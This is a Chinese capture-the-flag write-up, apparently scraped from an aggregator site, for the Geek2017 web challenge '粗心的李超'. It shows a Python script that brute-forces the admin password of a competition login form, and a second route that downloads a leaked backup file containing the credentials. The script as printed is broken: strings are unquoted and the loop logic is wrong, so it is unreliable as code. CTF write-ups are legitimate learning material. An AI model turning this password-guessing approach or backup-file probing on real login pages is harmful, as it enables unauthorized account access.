Geek2017 粗心的李超_writeup——网页表单提交备份文件泄露

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Geek2017 粗心的李超_writeup——网页表单提交备份文件泄露相关的知识,希望对你有一定的参考价值。

怎么又是web?  EXM?? 我一定是个假的二进制手

假装来看看吧

The first way:弱口令爆破   

 技术分享

网页里只有两个输入框,从源码里能找到name

技术分享

生成字典,去Python里request爆破吧,脚本如下

 1 # coding:utf-8
 2 import requests
 3 import time
 4 url=http://game.sycsec.com:2001
 5 f = open("dic.txt","r",encoding="utf-8")
 6 # print(len(f.readlines()))
 7 for i in range(f.readlines()):
 8     psd = f.readline().replace("\\n","")
 9     p = {user: admin, pass: psd}
10     print(p)
11     r = requests.post(url, data=p)
12     # time.sleep(1)
13     print(i)
14     if SYC in r.text:
15         print(r.text)
16         break

注意要把字典中的\\n去掉

另外在爆破过程中可能会蜜汁服务器拒绝响应,从上次断开的点重新开始吧

最后经过撕心裂肺的于get啦

技术分享

 

 The second way:备份文件泄露

技术分享

 

 直接能下载备份文件啦,果然是粗心的李超呢技术分享

 

技术分享

无限春光,尽收眼底

输进去就好啦

另外某大佬说用burpsuite,emmm等我学会了再来填坑吧

 

以上是关于Geek2017 粗心的李超_writeup——网页表单提交备份文件泄露的主要内容,如果未能解决你的问题,请参考以下文章

[Writeup]2021强网拟态 Give_me_your_0day

[Writeup]2021强网拟态 Give_me_your_0day

Geek2017_Buy me a Tesla - Write up

SYC极客大挑战部分题目writeup

CF1303G(点分治+李超线段树)

Writeup | 2017 ISG CTF 比赛